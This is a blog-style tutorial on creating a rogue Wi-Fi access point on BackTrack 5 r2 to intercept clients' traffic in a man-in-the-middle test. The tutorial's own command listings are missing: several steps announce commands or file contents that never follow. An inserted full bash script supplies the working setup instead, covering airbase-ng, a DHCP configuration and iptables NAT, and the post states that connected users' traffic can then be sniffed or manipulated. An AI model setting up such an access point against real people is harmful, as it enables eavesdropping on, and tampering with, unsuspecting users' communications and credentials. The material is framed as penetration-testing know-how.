
How to create a fake AP on BackTrack 5 r2

Hi to all!

In my last MITM test I needed a fake AP that relays all client traffic through a second wireless interface connected to the Internet.

I had some trouble doing this with brctl (a wireless card in station mode cannot be added to a bridge: 802.11 frames in that mode carry only three addresses, so the bridged MACs cannot be forwarded), so I put together a slightly laborious routed setup with the help of iptables instead. Obviously you need two wireless cards to follow this: one for the soft AP (wlan1 in this tutorial) and one connected to the Internet (wlan0 in this tutorial).

First, you need to install a DHCP server:

Backup the default DHCP server configuration file:

Create a new DHCP server configuration file:

and add these lines to the file:

Then, start wlan1 in monitor mode:

Now you have the monitor interface mon0. Start your soft AP on it (the -e option specifies the soft AP's ESSID, while -c specifies the 802.11 channel):

This will create a new interface called at0. Set up this interface and give it an address:

Now add a route for the traffic:

and set up the iptables rules (masquerading out of wlan0 and forwarding between at0 and wlan0). Remember that IP forwarding must be enabled in the kernel (net.ipv4.ip_forward = 1), otherwise the rules will not pass any traffic:

Start the DHCP server on the at0 interface:

Now everyone who connects to your fake AP will be routed transparently to the Internet, and all of their traffic passes through your machine, where you can sniff or manipulate it.
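The whole procedure above collected into one script, as an added example (this is not the FakeAP script from the post). It assumes wlan0 is the Internet uplink, wlan1 is the soft AP card, the AP is created with airbase-ng (which creates at0), the DHCP server is dhcp3-server with its configuration in /etc/dhcp3/dhcpd.conf, and the at0 network is 10.0.0.0/24; the ESSID, channel and addresses are placeholders. Set DRY_RUN=1 to print the commands and the generated dhcpd.conf instead of running anything.

```shell
#!/bin/bash
# Added example, not the post's own script: fake-AP setup as one script.
# Assumptions: wlan0 = Internet uplink, wlan1 = soft-AP card, airbase-ng
# creates at0, dhcp3-server reads /etc/dhcp3/dhcpd.conf, AP subnet 10.0.0.0/24.
# With DRY_RUN=1 every command is printed instead of executed.

UPLINK=${UPLINK:-wlan0}        # interface connected to the Internet
APIF=${APIF:-wlan1}            # interface used for the soft AP
ESSID=${ESSID:-FreeWifi}       # placeholder ESSID for the fake AP
CHANNEL=${CHANNEL:-6}          # placeholder 802.11 channel
AP_GW=10.0.0.1                 # address given to at0 (placeholder)
AP_MASK=255.255.255.0
DHCPD_CONF=${DHCPD_CONF:-/etc/dhcp3/dhcpd.conf}
DRY_RUN=${DRY_RUN:-0}

# Run a command, or just print it when DRY_RUN=1.
run() {
  if [ "$DRY_RUN" = 1 ]; then echo "$*"; else "$@"; fi
}

# DHCP configuration for the at0 network: clients get an address in the AP
# subnet, the AP itself as default gateway and a public resolver (placeholder).
dhcpd_conf() {
  cat <<EOF
default-lease-time 600;
max-lease-time 7200;
subnet 10.0.0.0 netmask $AP_MASK {
  option routers $AP_GW;
  option subnet-mask $AP_MASK;
  option domain-name-servers 8.8.8.8;
  range 10.0.0.100 10.0.0.200;
}
EOF
}

# Forwarding and NAT: traffic from at0 leaves masqueraded through the uplink
# and replies are allowed back. Without ip_forward=1 the rules pass nothing.
nat_rules() {
  run sysctl -w net.ipv4.ip_forward=1
  run iptables -t nat -A POSTROUTING -o "$UPLINK" -j MASQUERADE
  run iptables -A FORWARD -i at0 -o "$UPLINK" -j ACCEPT
  run iptables -A FORWARD -i "$UPLINK" -o at0 -m state --state ESTABLISHED,RELATED -j ACCEPT
}

# Bring up the soft AP: monitor mode, airbase-ng, address on at0, route, DHCP.
start_ap() {
  run airmon-ng start "$APIF"                        # creates mon0
  if [ "$DRY_RUN" = 1 ]; then
    echo "airbase-ng -e $ESSID -c $CHANNEL mon0 &"
    echo "# $DHCPD_CONF:"; dhcpd_conf
  else
    cp "$DHCPD_CONF" "$DHCPD_CONF.bak" 2>/dev/null    # keep the original config
    dhcpd_conf > "$DHCPD_CONF"
    airbase-ng -e "$ESSID" -c "$CHANNEL" mon0 > /tmp/airbase-ng.log 2>&1 &
    sleep 2                                          # wait for at0 to appear
  fi
  run ifconfig at0 "$AP_GW" netmask "$AP_MASK" up
  run route add -net 10.0.0.0 netmask "$AP_MASK" gw "$AP_GW"
  run dhcpd3 -cf "$DHCPD_CONF" at0
}

# Tear everything down, deleting only the rules this script added.
stop_ap() {
  run killall dhcpd3 airbase-ng
  run iptables -t nat -D POSTROUTING -o "$UPLINK" -j MASQUERADE
  run iptables -D FORWARD -i at0 -o "$UPLINK" -j ACCEPT
  run iptables -D FORWARD -i "$UPLINK" -o at0 -m state --state ESTABLISHED,RELATED -j ACCEPT
  run airmon-ng stop mon0
}

case "${1:-}" in
  start) nat_rules; start_ap ;;
  stop)  stop_ap ;;
esac
```

Usage: `DRY_RUN=1 ./fakeap.sh start` to review what would happen, then `./fakeap.sh start` as root and `./fakeap.sh stop` afterwards. The teardown deletes the exact rules it added rather than flushing the tables, so it does not wipe firewall rules that were there before the test.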

If you are too lazy to follow this tutorial, you can use a script I made to speed up fake AP creation.

Download it -> FakeAP.tar. Extract all the files into the same directory. Launch the script with:

When your tests are done, destroy the AP with:

Feel free to leave a comment or to contact us. Any feedback will be appreciated!